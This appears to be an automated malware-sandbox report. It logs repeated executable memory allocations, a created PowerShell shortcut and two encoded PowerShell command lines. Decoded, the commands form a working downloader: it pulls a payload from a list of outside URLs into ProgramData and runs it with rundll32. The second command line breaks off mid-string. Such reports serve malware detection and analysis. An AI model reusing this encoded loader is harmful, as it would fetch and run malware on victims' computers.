NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02990000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02991000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02992000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02993000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02994000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02995000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02996000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02997000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02998000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02999000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0299a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0299b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0299c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0299d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0299e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0299f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029a1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029a3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABFAGwAdQBhAHQAZQBkAEEAcABsAGUAYwB0AHIAdQBtACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBsAEEASABFAEEAZABRAEIAcABBAEgATQBBAGEAUQBCAG4AQQBHADQAQQBZAFEAQgBzAEEAQwA0AEEAWgBRAEIAdQBBAEcAYwBBAGEAUQBCAHUAQQBHAFUAQQBaAFEAQgB5AEEAQQA9AD0AIgA7ACQAUwBjAGEAcgBjAGUAbgBlAHMAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGUAUQBCAGgAQQBHADQAQQBiAHcAQgB3AEEASABNAEEAYQBRAEIAaABBAEYAQQBBAGMAZwBCAGgAQQBHAFUAQQBjAHcAQgBwAEEARwBRAEEAYQBRAEIAaABBAEMANABBAFoAQQBCAHAAQQBIAEkAQQBaAFEAQgBqAEEASABRAEEAYgB3AEIAeQBBAEgAawBBAFIAcwBwAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGIAdwBCAHQAQQBHADAAQQBZAFEAQgB1AEEARwBRAEEAYwBnAEIAcABBAEcAVQBBAEwAZwBCADAAQQBHAGcAQQBaAFEAQgBoAEEASABRAEEAWgBRAEIAeQBBAEEAPQA9AFIAcwBwAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARABBAEcAVQBBAGMAZwBCAGgAQQBIAFUAQQBiAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFUAQQBCAGgAQQBIAEkAQQBkAEEAQgBwAEEARwBVAEEAYwB3AEEAdQBBAEcATQBBAFoAUQBCAHUAQQBIAFEAQQBaAFEAQgB5AEEAQQA9AD0AUgBzAHAAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABnAEEATgBnAEEAdQBBAEQARQBBAE4AQQBBADMAQQBDADQAQQBOAFEAQQAwAEEAQwA0AEEATgBBAEEANABBAEEAPQA9ACIAOwAkAFIAZQBtAGkAZwByAGEAdABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AQQBBAHUAQQBEAEkAQQBNAEEAQQB3AEEAQwA0AEEATQBnAEEAMABBAEQAQQBBAEwAZwBBAHgAQQBEAFEAQQBOAEEAQQB2AEEASABvAEEAYgB3AEIAMABBAEQAZwBBAE0AZwBBAHYAQQBFAFEAQQBVAEEAQgBGAEEARwBjAEEAWQBnAEEAPQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE0AUQBBAHUAQQBEAEUAQQBPAFEAQQB4AEEAQwA0AEEATQBnAEEAeABBAEQAVQBBAEwAZwBBAHkAQQBEAFEAQQBOAGcAQQB2AEEASABRAEEATAB3AEIAVQBBAEYAWQBBAGMAdwBCAEIAQQBBAD0APQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE4AZwBBAHgAQQBDADgAQQBPAFEAQgBoAEEARABZAEEATgB3AEIAdwBBAEcAVQBBAGMAdwBBAHYAQQBFAGMAQQBXAGcAQQAwAEEARgBJAEEAUwBRAEIARwBBAEYAbwBBAFEAZwBCAHUAQQBBAD0APQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAawBBAEwAZwBBADUAQQBEAGcAQQBMAHcAQgBRAEEASABBAEEAVgBRAEIAWgBBAEYAZwBBAEwAdwBCAHYAQQBEAFEAQQBlAEEAQgBJAEEARwA4AEEAYwBRAEIAcwBBAEcAMABBAFcAQQBCAFYAQQBHAGsAQQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE0AUQBBAHcAQQBEAFEAQQBMAHcAQgBVAEEARQB3AEEAUgB3AEIAbwBBAEUANABBAFoAQQBBAHYAQQBFAE0AQQBNAGcAQgBwAEEARwBJAEEAYQBRAEIAUwBBAEgATQBBAFEAdwBCAHkAQQBFADgAQQBXAEEAQQA9ACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFQAcgBpAG0AbwBsAGUAYwB1AGwAYQByAEMAZQByAGEAdABvAGQAaQBkAGEAZQAgAGkAbgAgACQAUgBlAG0AaQBnAHIAYQB0AGkAbgBnACAALQBzAHAAbABpAHQAIAAiAFQAcABlAE4AIgApACAAewB0AHIAeQAgAHsAJABEAGUAbABpAHEAdQBpAHUAbQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIATgBBAEcAVQBBAGIAQQBCAHAAQQBIAEEAQQBiAHcAQgB1AEEARwBrAEEAYgBnAEIAaABBAEcAVQBBAFMAQQBCAHAAQQBHAHcAQQBiAEEAQgB2AEEARwBFAEEAWgBRAEIAawBBAEMANABBAFoAQQBCAHIAQQBBAD0APQBrAGIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBFAEEAZABRAEIAcABBAEgAWQBBAFoAUQBCAHkAQQBHAFUAQQBaAEEAQgBFAEEARwBrAEEAYwB3AEIAMABBAEcAVQBBAGIAZwBCAGsAQQBHAFUAQQBaAEEAQgBzAEEASABrAEEATABnAEIAbQBBAEcAOABBAGMAZwBCAHoAQQBHAEUAQQBiAEEAQgBsAEEAQQA9AD0AIgA7ACQAUABvAHIAbwBwAG8AcgBvACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBuAEEARwBFAEEAYgBBAEIAbABBAEgATQBBAFkAUQBCADEAQQBIAEkAQQBkAFEAQgB6AEEARgBBAEEAYwBnAEIAdgBBAEcATQBBAFoAUQBCAHkAQQBHAGsAQQBkAEEAQgBwAEEARwBNAEEATABnAEIAaQBBAEcARQBBAGMAZwBCAG4AQQBHAEUAQQBhAFEAQgB1AEEASABNAEEAIgA7ACQAcABvAGwAZQBzAHQAYQByAFAAbwBuAHQAaQBmAGkAYwBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVAByAGkAbQBvAGwAZQBjAHUAbABhAHIAQwBlAHIAYQB0AG8AZABpAGQAYQBlACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAcABvAGwAZQBzAHQAYQByAFAAbwBuAHQAaQBmAGkAYwBlAHMAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVQBuAGQAZQByAHUAdABpAGwAaQB6AGUALgBHAG8AdgBlAHIAbgBpAG4AZwA7ACQAUwB0AHUAbgBuAGUAcgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBsAEEASABNAEEAWQB3AEIAeQBBAEcAawBBAFkAZwBCAGgAQQBHADQAQQBiAHcAQgBWAEEARwA0AEEAYwB3AEIAaABBAEcATQBBAGMAZwBCAGwAQQBHAFEAQQBMAGcAQgB5AEEARwBFAEEAWQB3AEIAcABBAEcANABBAFoAdwBBAD0AIgA7ACQAYwBvAHIAawBpAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADgAQQBjAEEAQgB3AEEARwA4AEEAYwB3AEIAcABBAEgAUQBBAGEAUQBCAHcAQQBHADgAQQBiAEEAQgBoAEEASABJAEEAUQB3AEIANQBBAEgAUQBBAGIAdwBCAHQAQQBHAGsAQQBZAHcAQgB5AEEARwA4AEEAYwB3AEIAdgBBAEcAMABBAFoAUQBBAHUAQQBHAE0AQQBiAHcAQgB2AEEARwBzAEEAYQBRAEIAdQBBAEcAYwBBAFcAUwA9AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGEAQQBCAHYAQQBIAFEAQQBiAHcAQgAwAEEARwBVAEEAYgBBAEIAbABBAEgATQBBAFkAdwBCAHYAQQBIAEEAQQBhAFEAQgBqAEEARgBVAEEAYgBnAEIAaABBAEgAQQBBAGMAQQBCAHMAQQBHAEUAQQBkAFEAQgBrAEEARwBVAEEAWgBBAEEAdQBBAEcATQBBAFkAUQBCAHoAQQBHAEUAQQBXAFMAPQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFYAQQBHADQAQQBaAEEAQgBsAEEASABJAEEAWgBRAEIANQBBAEcAawBBAGIAZwBCAG4AQQBDADQAQQBhAHcAQgBwAEEASABRAEEAWQB3AEIAbwBBAEcAVQBBAGIAZwBBAD0AIgA7ACQAYgBhAHIAZwBoAGUAcwB0AHMAUwBhAHAAcgBvAGIAaQBjAGEAbABsAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFEAQQBOAFEAQQB1AEEARABJAEEATgBBAEEAMgBBAEMANABBAE4AZwBBADUAQQBDADQAQQBNAFEAQQB6AEEARABVAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVQBuAGQAZQByAHUAdABpAGwAaQB6AGUALgBHAG8AdgBlAHIAbgBpAG4AZwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANQAyADkAOAA0ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARgBVAEEAYgBnAEIAawBBAEcAVQBBAGMAZwBCADEAQQBIAFEAQQBhAFEAQgBzAEEARwBrAEEAZQBnAEIAbABBAEMANABBAFIAdwBCAHYAQQBIAFkAQQBaAFEAQgB5AEEARwA0AEEAYQBRAEIAdQBBAEcAYwBBAEwAQQBCAGkAQQBHAGsAQQBiAGcAQgBrAEEARABzAEEAIgA7ACQAYgBpAGEAbgBuAHUAYQBsAGwAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAbwBBAEcARQBBAGIAQQBCAHMAQQBHAEUAQQBhAEEAQQB1AEEARwBNAEEAYgB3AEIAdABBAEgAQQBBAGQAUQBCADAAQQBHAFUAQQBjAGcAQQA9AGQAWQBIAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGMAZwBCAHYAQQBHAFUAQQBiAGcAQgBzAEEARwBFAEEAYwBnAEIAbgBBAEcAVQBBAGIAUQBCAGwAQQBHADQAQQBkAEEAQgBQAEEARwBNAEEAZABBAEIAdgBBAEcAUQBBAFkAUQBCAGoAQQBIAFEAQQBlAFEAQgBzAEEARwA4AEEAZABRAEIAegBBAEMANABBAFoAdwBCAGgAQQBHAHcAQQBiAEEAQgBsAEEASABJAEEAZQBRAEEAPQBkAFkASABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEkAQQBOAGcAQQB1AEEARABFAEEATgBnAEEANQBBAEMANABBAE4AdwBBADIAQQBDADQAQQBOAFEAQQAxAEEAQQA9AD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAA7AH0AfQA="

cmdline

powershell -encodedcommand "JABFAGwAdQBhAHQAZQBkAEEAcABsAGUAYwB0AHIAdQBtACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBsAEEASABFAEEAZABRAEIAcABBAEgATQBBAGEAUQBCAG4AQQBHADQAQQBZAFEAQgBzAEEAQwA0AEEAWgBRAEIAdQBBAEcAYwBBAGEAUQBCAHUAQQBHAFUAQQBaAFEAQgB5AEEAQQA9AD0AIgA7ACQAUwBjAGEAcgBjAGUAbgBlAHMAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGUAUQBCAGgAQQBHADQAQQBiAHcAQgB3AEEASABNAEEAYQBRAEIAaABBAEYAQQBBAGMAZwBCAGgAQQBHAFUAQQBjAHcAQgBwAEEARwBRAEEAYQBRAEIAaABBAEMANABBAFoAQQBCAHAAQQBIAEkAQQBaAFEAQgBqAEEASABRAEEAYgB3AEIAeQBBAEgAawBBAFIAcwBwAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGIAdwBCAHQAQQBHADAAQQBZAFEAQgB1AEEARwBRAEEAYwBnAEIAcABBAEcAVQBBAEwAZwBCADAAQQBHAGcAQQBaAFEAQgBoAEEASABRAEEAWgBRAEIAeQBBAEEAPQA9AFIAcwBwAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARABBAEcAVQBBAGMAZwBCAGgAQQBIAFUAQQBiAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFUAQQBCAGgAQQBIAEkAQQBkAEEAQgBwAEEARwBVAEEAYwB3AEEAdQBBAEcATQBBAFoAUQBCAHUAQQBIAFEAQQBaAFEAQgB5AEEAQQA9AD0AUgBzAHAAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABnAEEATgBnAEEAdQBBAEQARQBBAE4AQQBBADMAQQBDADQAQQBOAFEAQQAwAEEAQwA0AEEATgBBAEEANABBAEEAPQA9ACIAOwAkAFIAZQBtAGkAZwByAGEAdABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AQQBBAHUAQQBEAEkAQQBNAEEAQQB3AEEAQwA0AEEATQBnAEEAMABBAEQAQQBBAEwAZwBBAHgAQQBEAFEAQQBOAEEAQQB2AEEASABvAEEAYgB3AEIAMABBAEQAZwBBAE0AZwBBAHYAQQBFAFEAQQBVAEEAQgBGAEEARwBjAEEAWQBnAEEAPQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE0AUQBBAHUAQQBEAEUAQQBPAFEAQQB4AEEAQwA0AEEATQBnAEEAeABBAEQAVQBBAEwAZwBBAHkAQQBEAFEAQQBOAGcAQQB2AEEASABRAEEATAB3AEIAVQBBAEYAWQBBAGMAdwBCAEIAQQBBAD0APQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE4AZwBBAHgAQQBDADgAQQBPAFEAQgBoAEEARABZAEEATgB3AEIAdwBBAEcAVQBBAGMAdwBBAHYAQQBFAGMAQQBXAGcAQQAwAEEARgBJAEEAUwBRAEIARwBBAEYAbwBBAFEAZwBCAHUAQQBBAD0APQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAawBBAEwAZwBBADUAQQBEAGcAQQBMAHcAQgBRAEEASABBAEEAVgBRAEIAWgBBAEYAZwBBAEwAdwBCAHYAQQBEAFEAQQBlAEEAQgBJAEEARwA4AEEAYwBRAEIAcwBBAEcAMABBAFcAQQBCAFYAQQBHAGsAQQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE0AUQBBAHcAQQBEAFEAQQBMAHcAQgBVAEEARQB3AEEAUgB3AEIAbwBBAEUANABBAFoAQQBBAHYAQQBFAE0AQQBNAGcAQgBwAEEARwBJAEEAYQBRAEIAUwBBAEgATQBBAFEAdwBCAHkAQQBFADgAQQBXAEEAQQA9ACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFQAcgBpAG0AbwBsAGUAYwB1AGwAYQByAEMAZQByAGEAdABvAGQAaQBkAGEAZQAgAGkAbgAgACQAUgBlAG0AaQBnAHIAYQB0AGkAbgBnACAALQBzAHAAbABpAHQAIAAiAFQAcABlAE4AIgApACAAewB0AHIAeQAgAHsAJABEAGUAbABpAHEAdQBpAHUAbQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIATgBBAEcAVQBBAGIAQQBCAHAAQQBIAEEAQQBiAHcAQgB1AEEARwBrAEEAYgBnAEIAaABBAEcAVQBBAFMAQQBCAHAAQQBHAHcAQQBiAEEAQgB2AEEARwBFAEEAWgBRAEIAawBBAEMANABBAFoAQQBCAHIAQQBBAD0APQBrAGIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBFAEEAZABRAEIAcABBAEgAWQBBAFoAUQBCAHkAQQBHAFUAQQBaAEEAQgBFAEEARwBrAEEAYwB3AEIAMABBAEcAVQBBAGIAZwBCAGsAQQBHAFUAQQBaAEEAQgBzAEEASABrAEEATABnAEIAbQBBAEcAOABBAGMAZwBCAHoAQQBHAEUAQQBiAEEAQgBsAEEAQQA9AD0AIgA7ACQAUABvAHIAbwBwAG8AcgBvACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBuAEEARwBFAEEAYgBBAEIAbABBAEgATQBBAFkAUQBCADEAQQBIAEkAQQBkAFEAQgB6AEEARgBBAEEAYwBnAEIAdgBBAEcATQBBAFoAUQBCAHkAQQBHAGsAQQBkAEEAQgBwAEEARwBNAEEATABnAEIAaQBBAEcARQBBAGMAZwBCAG4AQQBHAEUAQQBhAFEAQgB1AEEASABNAEEAIgA7ACQAcABvAGwAZQBzAHQAYQByAFAAbwBuAHQAaQBmAGkAYwBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVAByAGkAbQBvAGwAZQBjAHUAbABhAHIAQwBlAHIAYQB0AG8AZABpAGQAYQBlACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAcABvAGwAZQBzAHQAYQByAFAAbwBuAHQAaQBmAGkAYwBlAHMAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVQBuAGQAZQByAHUAdABpAGwAaQB6AGUALgBHAG8AdgBlAHIAbgBpAG4AZwA7ACQAUwB0AHUAbgBuAGUAcgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBsAEEASABNAEEAWQB3AEIAeQBBAE